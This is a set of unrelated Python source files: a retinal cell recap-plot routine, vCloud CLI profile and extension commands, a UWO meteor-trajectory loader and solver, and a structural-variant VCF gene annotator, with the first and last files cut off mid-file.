    """
    print("Generating the recap plot")
    # Switch pyplot/seaborn to the recap font sizes (restored at the end).
    # Dome variant: checkerboard STAs are drawn on polar subplots
    # (plot_dome_checker) instead of the cartesian plot_2d_sta.
    configure_pyplot_recap()
    # Group probe channels per shank for the template plot of each cluster.
    shanks_idx = buszaki_shank_channels(phy_dict["channel_positions"])
    cond = title_dict["condition"]
    date = title_dict["date"]
    record_name = title_dict["record_name"]
    record_id = title_dict["record_id"]
    if cell_db_ids is None:
        # -1 marks cells without a database id.
        cell_db_ids = [-1]*len(cluster_ids)
    with PdfPages(export_path) as pp:
        #Plotting Cover
        fig = plt.figure(figsize=(8.267717*2,11.69291*2)) #A4 values in inches *2
        gs = gridspec.GridSpec(28, 20, left=0.05, right=.95, top=.92, bottom=.05, wspace=0.00, hspace=0.00)
        ax_rem = fig.add_subplot(gs[:10,2:-1])
        reM.plot(ax_rem)
        suptitle = " - ".join([cond, date, record_name+" n°"+str(record_id)])
        plt.suptitle(suptitle)
        pp.savefig()
        plt.close()
        # One PDF page per cluster.
        for cluster, cell_id in zip(cluster_ids, cell_db_ids):
            # Map the phy cluster id to the cell's row index in the reM data.
            reM_cell_idx = reM["S_matrix"][0].attrs["cell_map"][cluster]#np.where(cluster==cluster_ids)[0][0]
            fig = plt.figure(figsize=(8.267717*2,11.69291*2)) #A4 values in inches *2
            suptitle = " - ".join([cond, date, record_name+" n°"+str(record_id),
                                   "Cluster n°"+str(cluster), "Cell id n°"+str(cell_id)])
            plt.suptitle(suptitle)
            # Templates merged into this cluster during manual curation.
            mask_cluster = phy_dict["spike_clusters"]==cluster
            cluster_composition = np.unique(phy_dict["spike_templates"][mask_cluster])
            gs = gridspec.GridSpec(28, 20, left=0.05, right=.95, top=.92, bottom=.05, wspace=0.00, hspace=0.00)
            #Template on electrodes
            cell_loc_ax = fig.add_subplot(gs[0:4,0:2])
            plot_spike_template(cell_loc_ax, cluster_composition, phy_dict["templates"], shanks_idx, phy_dict["channel_positions"])
            #Autocorrelogram
            autocorr_ax = fig.add_subplot(gs[0:4,3:7])
            plot_autocorrelogram(autocorr_ax, cluster, phy_dict["spike_times"], phy_dict["spike_clusters"],
                                 bin_ms=.001, sampling_rate=30000, tails=30)
            #Spike amplitude across time
            sp_amp_ax = fig.add_subplot(gs[0:4,8:])
            plot_spike_amplitudes(sp_amp_ax, cluster, phy_dict["spike_templates"], phy_dict["spike_clusters"],
                                  phy_dict["spike_times"], phy_dict["amplitudes"])
            plot_stim_epochs_to_spikes(sp_amp_ax, reM, y_pos=0.6)
            #Checkerboard STA
            if checkerboard is not None:
                # Smallest non-zero p-value (zeros are treated as unset).
                pval_checker = checkerboard[1][reM_cell_idx]
                pval_checker = np.min(pval_checker[pval_checker!=0])
                inner_grid = gridspec.GridSpecFromSubplotSpec(2, 8,
                                subplot_spec=gs[5:12,:], wspace=.09, hspace=.13)
                plot_dome_checker(checkerboard[0][reM_cell_idx], s=8, pval=pval_checker, grid=inner_grid)
            #Fullfield flickering STA
            if fullfield_fl is not None:
                pval_fffl = fullfield_fl[1][reM_cell_idx]
                pval_fffl = np.min(pval_fffl[pval_fffl!=0])
                # sp_amp_ax = fig.add_subplot(gs[5:12,13:])
                # Placed in the bottom-left slot (no flickering bars panel in
                # the dome layout).
                sp_amp_ax = fig.add_subplot(gs[21:,:12])
                plot_t_sta(sp_amp_ax, fullfield_fl[0][reM_cell_idx], pval=pval_fffl)
            #Chirp_FM
            if chirp_fm is not None:
                chirpfm_ax = fig.add_subplot(gs[13:16,:])
                plot_chirp(chirpfm_ax, chirp_fm[0], chirp_fm[1][:,reM_cell_idx], smooth=False)
                chirpfm_ax.set_title("Chirp FM")
            #Chirp_AM
            if chirp_am is not None:
                chirpam_ax = fig.add_subplot(gs[17:20,:])
                plot_chirp(chirpam_ax, chirp_am[0], chirp_am[1][:,reM_cell_idx], smooth=False)
                chirpam_ax.set_title("Chirp AM")
            #Moving gratings
            if moving_gratings is not None:
                ds_ax = fig.add_subplot(gs[21:,13:], projection="polar")
                plot_ds_wheel(ds_ax, moving_gratings, cell_idx=reM_cell_idx)
            pp.savefig()
            plt.close()
            print("Cell cluster n°",cluster,"done")
    # Restore default matplotlib/seaborn styling.
    sns.set()
    plt.rcdefaults()
    print()
<gh_stars>1-10
# vCloud CLI 0.1
#
# Copyright (c) 2014-2018 VMware, Inc. All Rights Reserved.
#
# This product is licensed to you under the
# Apache License, Version 2.0 (the "License").
# You may not use this product except in compliance with the License.
#
# This product may include a number of subcomponents with
# separate copyright notices and license terms. Your use of the source
# code for the these subcomponents is subject to the terms and
# conditions of the subcomponent's license, as noted in the LICENSE file.
#
import click
import yaml
from vcd_cli.profiles import Profiles
from vcd_cli.utils import restore_session
from vcd_cli.utils import stderr
from vcd_cli.utils import stdout
from vcd_cli.vcd import abort_if_false
from vcd_cli.vcd import vcd
@vcd.group(short_help='manage profiles')
@click.pass_context
def profile(ctx):
    """Manage user profiles
    """
    # Group container only; the behavior lives in the subcommands
    # (info, extension). The docstring doubles as the click help text.
    pass
@profile.command('info', short_help='show details of current profile')
@click.pass_context
def info(ctx):
    # Dump the whole profiles file to stdout as YAML. (Comment instead of a
    # docstring: click would turn a docstring into new help text.)
    try:
        current = Profiles.load()
        click.echo(yaml.dump(current.data, default_flow_style=False))
    except Exception as e:
        stderr(e, ctx)
@profile.group(short_help='work with vcd-cli extensions')
@click.pass_context
def extension(ctx):
    """Manage vcd-cli extensions.
    \b
    Description
        Manages commands added to vcd-cli.
    \b
        New commands can be added to vcd-cli as Python modules. The module
        containing the commands implementation needs to be present in the
        Python path.
    \b
    Examples
        vcd profile extension list
            List the extension modules currently registered with vcd-cli.
    \b
        vcd profile extension add container_service_extension.client.cse
            Add to vcd-cli the commands to work with CSE, located in the
            specified Python module.
    \b
        vcd profile extension delete container_service_extension.client.cse
            Removes the CSE commands from vcd-cli.
    \b
    Files
        ~/.vcd-cli/profiles.yaml (macOS and Linux)
        %userprofile%/.vcd-cli/profiles.yaml (Windows)
            The extension modules are registered in the profiles file.
    """
    # Group container only; list/add/delete implement the behavior. The
    # docstring above is rendered verbatim by click as the command help.
    pass
@extension.command('list', short_help='list vcd-cli extensions')
@click.pass_context
def list_extensions(ctx):
    # Echo each registered extension module, one per line.
    try:
        profiles = Profiles.load()
        registered = profiles.data['extensions'] \
            if 'extensions' in profiles.data else None
        if registered is not None:
            for ext_module in registered:
                click.echo(ext_module)
    except Exception as e:
        stderr(e, ctx)
@extension.command(short_help='add a vcd-cli extension')
@click.pass_context
@click.argument('module')
def add(ctx, module):
    # Register MODULE in the profiles file unless it is already present.
    try:
        profiles = Profiles.load()
        if 'extensions' not in profiles.data or \
           profiles.data['extensions'] is None:
            profiles.data['extensions'] = []
        if module not in profiles.data['extensions']:
            profiles.data['extensions'].append(module)
            profiles.save()
            click.secho('Extension added from module \'%s\'.' % module)
        else:
            raise Exception('module already in the profile')
    except Exception as e:
        # Bug fix: the caught exception was discarded, hiding the actual
        # reason (including the deliberate "already in the profile" error
        # raised above). Include it in the message.
        stderr('Could not add extension from module \'%s\': %s' % (module, e),
               ctx)
@extension.command(short_help='delete a vcd-cli extension')
@click.pass_context
@click.argument('module')
@click.option(
    '-y',
    '--yes',
    is_flag=True,
    callback=abort_if_false,
    expose_value=False,
    prompt='Are you sure you want to delete the extension?')
def delete(ctx, module):
    # Remove MODULE from the profiles file after interactive confirmation.
    try:
        profiles = Profiles.load()
        # list.remove raises ValueError when the module is not registered;
        # that (and a missing 'extensions' key) is reported below.
        profiles.data['extensions'].remove(module)
        profiles.save()
        click.secho('Extension from module \'%s\' deleted.' % module)
    except Exception as e:
        # Bug fix: the caught exception was discarded; include it so the user
        # can tell "not registered" from an I/O failure.
        stderr('Could not delete extension from module \'%s\': %s'
               % (module, e), ctx)
@vcd.command(short_help='current resources in use')
@click.pass_context
def pwd(ctx):
    """Current resources in use
    """
    # Report the host/user/org/vdc/vApp of the restored session.
    try:
        restore_session(ctx)
        session = ctx.obj['profiles']
        resources = {
            'host': session.get('host'),
            'user': session.get('user'),
            'org': session.get('org_in_use'),
            'vdc': session.get('vdc_in_use'),
            'vapp': session.get('vapp_in_use')
        }
        message = ('connected to %s as \'%s\'\n' +
                   'using org: \'%s\', vdc: \'%s\', vApp: \'%s\'.') % \
                  (resources['host'], resources['user'], resources['org'],
                   resources['vdc'], resources['vapp'])
        stdout(resources, ctx, message)
    except Exception as e:
        stderr(e, ctx)
|
<filename>wmpl/Formats/EventUWO.py
""" Recompute the meteor trajectory from UWO-format event.txt files. """
import os
import sys
import numpy as np
from wmpl.Formats.GenericArgumentParser import addSolverOptions
from wmpl.Trajectory.GuralTrajectory import GuralTrajectory
from wmpl.Trajectory.Trajectory import Trajectory
from wmpl.Utils.TrajConversions import jd2Date
class StationData(object):
    """Container for the observations of a single station."""

    def __init__(self, jd_ref, lat, lon, height, station_id):
        # Reference Julian date and station identifier
        self.jd_ref = jd_ref
        self.station_id = station_id
        # Geographic coordinates (radians) and elevation (meters)
        self.lon = lon
        self.lat = lat
        self.height = height
        # Per-pick observation arrays, filled in by the loader
        self.time_data = []
        self.theta_data = []
        self.phi_data = []
        self.mag_data = []

    def __repr__(self):
        # Assemble the report as a list of lines and join once at the end.
        parts = ["StationData object:\n"]
        parts.append("    JD ref: {:s}\n".format(str(self.jd_ref)))
        parts.append("    Time ref: {:s}\n".format(jd2Date(self.jd_ref, \
            dt_obj=True).strftime("%Y-%m-%d %H:%M:%S.%f")))
        parts.append("    Lat: {:.6f} deg\n".format(np.degrees(self.lat)))
        parts.append("    Lon: {:.6f} deg\n".format(np.degrees(self.lon)))
        parts.append("    Ele: {:.2f} m\n".format(self.height))
        parts.append("\n")
        parts.append("    Time, Theta, Phi, Mag\n")
        for t_pick, theta, phi, mag in zip(self.time_data, np.degrees(self.theta_data), \
            np.degrees(self.phi_data), self.mag_data):
            parts.append("{:7.3f}, {:9.6f}, {:10.6f}, {:+6.2f}\n".format(t_pick, theta, phi, mag))
        return "".join(parts)
def loadEventData(event_file_path):
    """ Load observation data from the event file.

    Parses UWO event.txt lines of three kinds: "dat" (event metadata, must
    contain the reference Julian date "jd"), "obs" (one observer/station),
    and "fit" (one position pick, linked to its observer via the "tag" field).

    Returns a dict with keys "jd_ref", "dir_path" and "station_data" (a list
    of StationData objects, one per observer).
    """
    with open(event_file_path) as f:
        observers = {}
        data_points = {}
        for line in f:
            line = line.replace('\n', '').replace('\r', '')
            # Check if the line gives general event data
            if line.startswith("dat"):
                # Parse the observer string
                line = line.replace("dat ; ", '')
                entries = line.split()
                # Store the data into a dictionary
                # NOTE: this maps every token to its successor (overlapping
                # pairs), so value->value entries also land in the dict; only
                # the known keys (e.g. "jd") are looked up later, so the
                # extras are harmless.
                data_dict = {entries[i]: entries[i + 1] for i in range(len(entries) - 1)}
            # Check if the line gives an observer
            elif line.startswith("obs"):
                # Parse the observer string
                line = line.replace("obs ; ", '')
                entries = line.split()
                # Store the observer into a dictionary
                obs_dict = {entries[i]: entries[i + 1] for i in range(len(entries) - 1)}
                # Store the observers dictionary with the tag as the key
                observers[obs_dict["tag"]] = obs_dict
            # Check if the line gives an observation
            elif line.startswith("fit"):
                # Parse the observation string
                line = line.replace("fit ; ", '')
                entries = line.split()
                # Store the observation into a dictionary
                point_dict = {entries[i]: entries[i + 1] for i in range(len(entries) - 1)}
                # Store the observation with the tag-no as the key
                data_points[point_dict["tag"] + "-" + point_dict["no"]] = point_dict
    # Get the reference Julian date
    # NOTE(review): assumes the file contains a "dat" line; otherwise
    # data_dict is unbound here (NameError) — confirm the format guarantees it.
    jd_ref = float(data_dict["jd"])
    dir_path = os.path.dirname(event_file_path)
    # Init the dictionary containing the observations
    station_data_dict = {}
    station_data_dict["jd_ref"] = jd_ref
    station_data_dict["dir_path"] = dir_path
    station_data_dict["station_data"] = []
    # Pair up observatins with stations and create StationData objects
    for obs_tag in observers:
        # Fetch all time, theta, phi, mag data from observations for this station
        data = []
        for point_key in data_points:
            # Check if the point starts with the observers tag
            if point_key.split("-")[0] == obs_tag:
                # Extract observations
                data.append(list(map(float, [data_points[point_key]["t"], data_points[point_key]["th"], \
                    data_points[point_key]["phi"], data_points[point_key]["mag"]])))
        # Sort the observations in time
        data = np.array(data)
        data = data[np.argsort(data[:, 0])]
        # Init the station data object
        lat = np.radians(float(observers[obs_tag]["lat"]))
        lon = np.radians(float(observers[obs_tag]["lon"]))
        # Elevation is given in km in the file; convert to meters
        elev = 1000*float(observers[obs_tag]["elv"])
        stat_data = StationData(jd_ref, lat, lon, elev, observers[obs_tag]["num"])
        # Add the position picks
        stat_data.time_data = data[:, 0]
        stat_data.theta_data = np.radians(data[:, 1])
        stat_data.phi_data = np.radians(data[:, 2])
        stat_data.mag_data = data[:, 3]
        # Add the station to the list of observers
        station_data_dict["station_data"].append(stat_data)
    return station_data_dict
def solveTrajectoryUWOEvent(station_data_dict, solver='original', velmodel=3, **kwargs):
    """ Runs the trajectory solver on points of the given type.

    Arguments:
        station_data_dict: [dict] Output of loadEventData with keys "jd_ref", "dir_path" and
            "station_data" (a list of StationData objects).

    Keyword arguments:
        solver: [str] Trajectory solver to use:
            - 'original' (default) - "in-house" trajectory solver implemented in Python
            - 'gural' - Pete Gural's PSO solver; a trailing digit (e.g. 'gural1') selects the
                velocity model
        velmodel: [int] Velocity propagation model for the Gural solver
            0 = constant  v(t) = vinf
            1 = linear    v(t) = vinf - |acc1| * t
            2 = quadratic v(t) = vinf - |acc1| * t + acc2 * t^2
            3 = exponent  v(t) = vinf - |acc1| * |acc2| * exp( |acc2| * t ) (default)
        **kwargs: extra options forwarded to the chosen solver.

    Return:
        [Trajectory or GuralTrajectory] solved trajectory object, or False if the input does
        not contain at least two stations.
    """

    # Check that there are at least two stations present (needed for triangulation)
    if len(station_data_dict["station_data"]) < 2:
        print('ERROR! The event.txt file does not contain multistation data!')
        return False

    if solver == 'original':

        # Init the in-house trajectory solver (meastype=4, matching the UWO data convention)
        traj = Trajectory(station_data_dict["jd_ref"], output_dir=station_data_dict["dir_path"], \
            meastype=4, **kwargs)

    elif solver.startswith('gural'):

        # Extract the velocity model if given as a trailing digit (e.g. 'gural2')
        try:
            velmodel = int(solver[-1])

        except (ValueError, IndexError):
            # Default to the exponential model
            velmodel = 3

        # Select extra keyword arguments that are present only for the gural solver
        gural_keys = ['max_toffset', 'nummonte', 'meastype', 'verbose', 'show_plots']

        # Start from defaults and let caller-supplied values override them. This avoids a
        #   "duplicate keyword argument" TypeError which occurred when e.g. 'verbose' or
        #   'meastype' was both passed explicitly and present in kwargs
        gural_kwargs = {'verbose': 1, 'meastype': 4}
        gural_kwargs.update({key: kwargs[key] for key in gural_keys if key in kwargs})

        # Init the new Gural trajectory solver object
        traj = GuralTrajectory(len(station_data_dict["station_data"]), station_data_dict["jd_ref"], \
            velmodel, output_dir=station_data_dict["dir_path"], **gural_kwargs)

    else:
        # Fail loudly on an unknown solver name instead of a NameError further down
        raise ValueError("Unknown solver: {:s}".format(str(solver)))

    # Infill trajectories from each site
    for stat_data in station_data_dict["station_data"]:

        # MC solver
        if solver == 'original':
            traj.infillTrajectory(stat_data.phi_data, stat_data.theta_data, stat_data.time_data, \
                stat_data.lat, stat_data.lon, stat_data.height, \
                station_id=stat_data.station_id, magnitudes=stat_data.mag_data)

        # Gural solver
        else:
            traj.infillTrajectory(stat_data.phi_data, stat_data.theta_data, stat_data.time_data, \
                stat_data.lat, stat_data.lon, stat_data.height)

    print('Filling done!')

    # Solve the trajectory
    traj.run()

    return traj
if __name__ == "__main__":

    import argparse

    # Set up the command line argument parser
    parser = argparse.ArgumentParser(description="Run the trajectory solver on the given UWO-format event.txt file.")

    parser.add_argument('event_path', nargs=1, metavar='MET_PATH', type=str, \
        help='Full path to the event.txt file.')

    # Attach the shared solver options
    parser = addSolverOptions(parser)

    # Parse the command line arguments
    cml_args = parser.parse_args()

    #########################

    event_path = os.path.abspath(cml_args.event_path[0])

    # Abort if the given event file does not exist
    if not os.path.isfile(event_path):
        print('No such file:', event_path)
        sys.exit()

    # Unpack optional solver arguments, falling back to None when they were not given
    max_toffset = cml_args.maxtoffset[0] if cml_args.maxtoffset else None
    velpart = cml_args.velpart if cml_args.velpart else None
    vinitht = cml_args.vinitht[0] if cml_args.vinitht else None

    # Load observations from the event.txt file
    station_data_dict = loadEventData(event_path)

    # Run trajectory solver on the loaded .met file
    solveTrajectoryUWOEvent(station_data_dict, solver=cml_args.solver, max_toffset=max_toffset, \
        monte_carlo=(not cml_args.disablemc), mc_runs=cml_args.mcruns, \
        geometric_uncert=cml_args.uncertgeom, gravity_correction=(not cml_args.disablegravity),
        plot_all_spatial_residuals=cml_args.plotallspatial, plot_file_type=cml_args.imgformat, \
        show_plots=(not cml_args.hideplots), v_init_part=velpart, v_init_ht=vinitht)
<gh_stars>1-10
import getopt
from sys import argv, exit
import multiprocessing
import pysam
import pybedtools
## capture the arguments required for the annotations;
## 1) the annotation file ; 2) the VCF to be annotated ; 3) the name of the output file [O] otherwise, same name + anno.vcf
## if further arguments are necessary we will deal with that later
def usage(scriptname):
    """Print the command line usage help (fixed: a space was missing after the script name)."""
    print(
        "USAGE: \n" + scriptname + ' -i <inputfile[M]> -o <outputfilename[O]> -a <AnnotationFilename(BED-formatFile)[M]>\n')
def processArgs(scriptname, argv):
    """Parse command line options and set the global file-name variables.

    Sets the globals ``vcf`` (input VCF, mandatory, -i/--vcf), ``annof``
    (annotation BED file, mandatory, -a/--annof) and ``outvcfname`` (output
    name, -o/--outvcfname; defaults to "<vcf>.anno.vcf"). Exits with status 2
    on bad or missing mandatory arguments.
    """
    global vcf
    global annof
    global outvcfname

    # Initialize the globals up front: previously, omitting -i or -a raised a
    # NameError at the mandatory-argument check below instead of printing usage
    vcf = None
    annof = None
    outvcfname = ""

    try:
        opts, args = getopt.getopt(argv, "hi:a:o:", ["vcf=", "annof=", "outvcfname="])
        print(opts)
    except getopt.GetoptError:
        usage(scriptname)
        exit(2)

    for opt, arg in opts:
        if opt == '-h':
            usage(scriptname)
            exit()
        elif opt in ("-i", "--vcf"):
            vcf = arg
        elif opt in ("-a", "--annof"):
            annof = arg
        elif opt in ("-o", "--outvcfname"):
            outvcfname = arg

    ## check args values and input requirements
    if vcf is None or annof is None:
        usage(scriptname)
        exit(2)

    if outvcfname is None or outvcfname == "":
        outvcfname = ''.join(str(vcf) + ".anno.vcf")

    print('VCF is: ',
          vcf)  ## input file; the filename can be a full path or relative to the current folder
    print('annof is: ', annof)
    print('outvcfname is: ', outvcfname)
def getAnno(LR, RR, genes):
    """
    :param LR: BedTool object with only one position defined for the Left Breakpoint of the current SV ; LR stands for Left Region
    :param RR: BedTool object with only one position defined for the Right Breakpoint of the current SV ; RR stands for Right Region
    :param genes: BedTool object with all the gene annotations in bedformat
    :return: list of six (gene_name(s), dist, strand) tuples: the upstream, intersecting and
        downstream gene annotations for the left breakpoint, followed by the same three for
        the right breakpoint
    """
    annotations = []
    for region in (LR, RR):
        annotations.append(getClosestUpstream(region, genes))
        annotations.append(getIsec(region, genes))
        annotations.append(getClosesetDownstream(region, genes))
    return annotations
def getIsec(locus, genes):
    """
    Annotate a single-position locus with the gene it directly intersects.

    :param locus: BedTool object with only one position defined
    :param genes: BedTool object with all the gene annotations in bedformat
    :return: tuple of strings (gene_name, dist, strand); (".___.", "0", ".") when the locus
        intersects no gene
    """
    isec = locus.intersect(genes, wao=True)
    if isec is None or isec == "":
        return (".___.", "0", ".")  ## no intersection with any gene

    # Convert to a dataframe once instead of once per extracted column
    df = isec.to_dataframe()

    gene = set(df.iloc[0:1, 6]).pop()  ## here we keep only the first gene in the list
    strand = set(df.iloc[0:1, 8]).pop()

    if gene == ".":
        return (".___.", "0", ".")

    return (str(gene), str(0), str(strand))
def getClosestUpstream(locus, genes):
    """
    Annotate a single-position locus with its closest upstream gene (overlapping features
    are ignored, io=True; search is restricted upstream, fu=True).

    :param locus: BedTool object with only one position defined
    :param genes: BedTool object with all the gene annotations in bedformat
    :return: tuple of strings (gene_name, dist, strand); (".___.", "0", ".") when no
        upstream gene is found
    """
    theclosest = locus.closest(genes, io=True, fu=True, D="a", d=True, t="first")
    if theclosest is None or theclosest == "":
        return (".___.", "0", ".")  ## no closest gene upstream

    # Convert to a dataframe once instead of once per extracted column
    df = theclosest.to_dataframe()

    gene = set(df.iloc[0:1, 6]).pop()  ## here we keep only the first gene in the list
    if gene == ".":
        return (".___.", "0", ".")

    dist = set(df.iloc[0:1, 9]).pop()
    strand = set(df.iloc[0:1, 8]).pop()

    return (str(gene), str(dist), str(strand))
def getClosesetDownstream(locus, genes):
    """
    Annotate a single-position locus with its closest downstream gene (overlapping features
    are ignored, io=True; search is restricted downstream, fd=True).

    :param locus: BedTool object with only one position defined
    :param genes: BedTool object with all the gene annotations in bedformat
    :return: tuple of strings (gene_name, dist, strand); (".___.", "0", ".") when no
        downstream gene is found
    """
    theclosest = locus.closest(genes, io=True, fd=True, D="a", d=True, t="first")
    if theclosest is None or theclosest == "":
        # no closest gene downstream
        return (".___.", str(0), ".")

    # Convert to a dataframe once instead of once per extracted column
    df = theclosest.to_dataframe()

    gene = set(df.iloc[0:1, 6]).pop()  ## here we keep only the first gene in the list
    if gene == ".":
        return (".___.", "0", ".")

    dist = set(df.iloc[0:1, 9]).pop()
    strand = set(df.iloc[0:1, 8]).pop()

    return (str(gene), str(dist), str(strand))
def getGenesOverlappinRegion(rec, genes):
    """
    :param rec: vcf record pysam-formatted
    :param genes: BedTool object with all the gene annotations in bedformat
    :return: string representation of the set of gene names overlapping the SV region,
        or the NOGENE placeholder for TRA records and when no gene overlaps
    """
    NOGENE = str(set([".___."]))

    # Translocations have no contiguous region between the breakpoints
    if rec.info['SVTYPE'] == "TRA":
        return NOGENE

    chr1 = rec.chrom
    POS1 = rec.pos
    POS2 = rec.info['ENDPOSSV']

    # Make sure the coordinates are in increasing order
    if int(POS2) < int(POS1):
        POS1, POS2 = rec.info['ENDPOSSV'], rec.pos

    locus = pybedtools.BedTool(' '.join([chr1, str(POS1 - 1), str(POS2)]), from_string=True)

    isec = locus.intersect(genes, wao=True)
    if isec is None or isec == "":
        return NOGENE  ## no intersection with any gene

    gene = set(isec.to_dataframe().iloc[0::, 6])  ## here we get ALL the Genes in column 6

    # BUGFIX: `gene` is a set, so it must be compared against the placeholder set.
    # The old comparisons against the strings "." and "{'.'}" could never match.
    if gene == {"."}:
        return NOGENE

    return str(gene)
def getLenghtRegion(rec):
    """
    :param rec: vcf record pysam-formatted
    :return: length of the region of interest, abs(ENDPOSSV - pos); -1 for TRA records
    """
    svtype = rec.info['SVTYPE']
    if svtype == "TRA":
        return -1
    return abs(rec.info['ENDPOSSV'] - rec.pos)
def newHeaders(myvcf):
    """Register the annotation INFO tags on the VCF header and return the VCF object."""
    # (tag, number, type, description) for every INFO field this tool adds
    info_tags = [
        ("RGENUPS", "3", "String",
         "Gene,DistToBreakPoint,Strand for Upstream Gene to the Right BreakPoint"),
        ("RGENISEC", "3", "String",
         "Gene,DistToBreakPoint,Strand for Gene Intersecting the Right BreakPoint"),
        ("RGENDNS", "3", "String",
         "Gene,DistToBreakPoint,Strand for Downstream Gene to the Right BreakPoint"),
        ("LGENUPS", "3", "String",
         "Gene,DistToBreakPoint,Strand for Upstream Gene to the Left BreakPoint"),
        ("LGENISEC", "3", "String",
         "Gene,DistToBreakPoint,Strand for Gene Intersecting the Left BreakPoint"),
        ("LGENDNS", "3", "String",
         "Gene,DistToBreakPoint,Strand for Downstream Gene to the Left BreakPoint"),
        ("GENELISTbtwBP", ".", "String",
         "List of genes between the two defined breakpoint for DEL, DUP, INS, and INV"),
        ("LENSV", "1", "Integer",
         "Length of the SV for DEL, DUP, INS, and INV; TRA will have lenght of 0"),
    ]
    for tag, number, typ, desc in info_tags:
        myvcf.header.info.add(tag, number, typ, desc)
    return myvcf
def write_new_vcf(vcf, newheader, LVAR, outfilename=""):
    """Write the annotated records to a new VCF file.

    :param vcf: input VCF file name, used to derive the default output name
    :param newheader: VCF header (object or string) written first
    :param LVAR: iterable of annotated variant records (stringified on write)
    :param outfilename: output file name; defaults to "<vcf>.parallel.anno.vcf"
    """
    if outfilename is None or outfilename == "":
        outfilename = "".join([str(vcf), ".parallel.anno.vcf"])

    with open(outfilename, "w") as f:
        f.write(str(newheader))
        # writelines batches the output; the stray debug print was removed
        f.writelines(str(record) for record in LVAR)
def main(scriptname, argv):
    """Stand-alone entry point: parse args, load the data and annotate the VCF in parallel.

    Writes the annotated records to 'outFile.vcf'.
    """
    processArgs(scriptname, argv)

    from pybedtools import BedTool

    global genes
    genes = BedTool(annof).sort()

    ## we read the entire vcf file at once and annotate the breakpoints of each record
    vcfr = pysam.VariantFile(vcf, "r")

    ## updating header with new info Tags
    vcfr = newHeaders(vcfr)

    # annotateVariant() looks records up BY INDEX in the global my_list, so the
    # list must be bound globally and the pool must map over indices (the
    # original mapped over the variant objects themselves, which crashed)
    global my_list
    my_list = [variant for variant in vcfr]

    from multiprocessing import Pool

    logger = multiprocessing.log_to_stderr()
    # multiprocessing.SUBDEBUG does not exist in Python 3; the level lives in
    # multiprocessing.util
    logger.setLevel(multiprocessing.util.SUBDEBUG)

    pool = Pool(processes=12)  # start 12 worker processes
    try:
        result_list = pool.map(func=annotateVariant_parallel,
                               iterable=range(len(my_list)))
    finally:
        # make sure the workers are always torn down
        pool.close()
        pool.join()

    with open('outFile.vcf', 'w') as out_file:
        out_file.writelines(result_list)
def annotateVariant_parallel(i):
    """Thin wrapper so annotateVariant can be used as a multiprocessing pool worker."""
    return annotateVariant(i)
def annotateVariant(i):
    """Annotate the i-th record of the global my_list and return it as a string."""
    rec = my_list[i]

    left_chrom, right_chrom = rec.chrom, rec.info['CHR2']
    left_pos, right_pos = rec.pos, rec.info['ENDPOSSV']

    rec.info['LENSV'] = getLenghtRegion(rec)
    rec.info['GENELISTbtwBP'] = getGenesOverlappinRegion(rec, genes).replace(" ", "")

    # One-position BedTool objects for the left (LR) and right (RR) breakpoints of the SV
    LR = pybedtools.BedTool(' '.join([left_chrom, str(left_pos - 1), str(left_pos)]), from_string=True)
    RR = pybedtools.BedTool(' '.join([right_chrom, str(right_pos - 1), str(right_pos)]), from_string=True)

    ## attach the intersecting, upstream and downstream gene annotations to the record
    rec.info['RGENUPS'], rec.info['RGENISEC'], rec.info['RGENDNS'], \
        rec.info['LGENUPS'], rec.info['LGENISEC'], rec.info['LGENDNS'] = getAnno(LR, RR, genes)

    return str(rec)
##@@@@@@@@
## MAIN ##
##@@@@@@@@
if __name__ == "__main__":
    # main(argv[0], argv[1:])
    # exit()
    # Parse -i/-a/-o into the globals vcf, annof and outvcfname
    processArgs(argv[0], argv[1:])
    import time
    from pybedtools import BedTool
    # NOTE(review): `global` at module level is a no-op; the assignment below
    # already creates a module-global binding
    global genes
    print("sorting the annotation bedfile ... ")
    genes = BedTool(annof).sort()
    ## we read the entire vcf file at once or we stream the record and process the extraction of the required info to annotate the breakpoints
    vcfr = pysam.VariantFile(vcf, "r")
    ## updating header with new info Tags
    vcfr = newHeaders(vcfr)
    newheader = vcfr.header
    ## init list for new Variants
    res = []
    # my_list is read by index in annotateVariant() inside the worker processes
    global my_list
    my_list = [variant for variant in vcfr]
    my_range = [i for i in range(len(my_list))]
    from multiprocessing import Pool
    import logging
    try:
        logger = multiprocessing.log_to_stderr()
        # NOTE(review): multiprocessing.SUBDEBUG does not exist in Python 3 (it
        # moved to multiprocessing.util.SUBDEBUG) -- this line raises an
        # AttributeError on py3; confirm the intended Python version
        logger.setLevel(multiprocessing.SUBDEBUG)
        ncpus = multiprocessing.cpu_count()
        pool = Pool(processes=ncpus)  # start one worker per CPU
        result_list = pool.map(func=annotateVariant_parallel, iterable=my_range)
        time.sleep(2)
        # print(logger)
    finally:
        pool.close()
        pool.join()
    # print("results list")
    # print(type(result_list))
    # print(len(result_list))
    from operator import itemgetter
    # NOTE(review): sorted() returns a new list which is discarded here, so this
    # statement has no effect; rebind result_list if sorting is actually intended
    sorted(result_list,key=itemgetter(1,2))
    # print([str(rec) for rec in result_list[0:2]])
    write_new_vcf(vcf, newheader, result_list, outvcfname)
## Example of vcf record
# X 96655464 DEL00008569 T <DEL> . PASS
# PRECISE;SVTYPE=DEL;SVMETHOD=EMBL.DELLYv0.7.5;CHR2=X;ENDPOSSV=96781481;INSLEN=0;HOMLEN=3;PE=21;
# MAPQ=60;CT=3to5;CIPOS=-4,4;CIEND=-4,4;SR=7;SRQ=1;
# CONSENSUS=ACAGTGTACTATGTGATGTTTTGACATATGTATACCAAATCCATTTAGCACTTGGTAACAAAAGGTAAGAATAGACATTGAATACTGTACTATTTTTA;
# CE=1.87385;RDRATIO=0.257492;SOMATIC
# GT:GL:GQ:FT:RCL:RC:RCR:CN:DR:DV:RR:RV:RCALT:RDISTDISC1:RDISTDISC2:RCDIS1:RCDIS2
# 1/1:-17.8973,-1.80346,0:18:PASS:2439:1227:2350:1:2:21:0:6:27:690:704:21:21
# 0/0:0,-1.20172,-11.4976:12:LowQual:3039:6207:3199:2:16:0:4:0:0:-1:-1:0:0
|
#21datalabplugin
import numpy
from system import __functioncontrolfolder
from model import date2secs, secs2dateString, date2msecs
import dates
import copy
import remote
import pandas as pd
from remote import RemoteModel
#import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
import matplotlib.dates as plotdates
import stumpy as stp
import scipy as scy
import time as ti
# use a list to avoid loading of this in the model as template
mycontrol = [copy.deepcopy(__functioncontrolfolder)]
# set the value of the control folder's last child to "threaded"
# (presumably the execution mode -- confirm against __functioncontrolfolder's layout)
mycontrol[0]["children"][-1]["value"]="threaded"
# Template tree for the StumpyMiner plugin: the miner function nodes (STUMP and
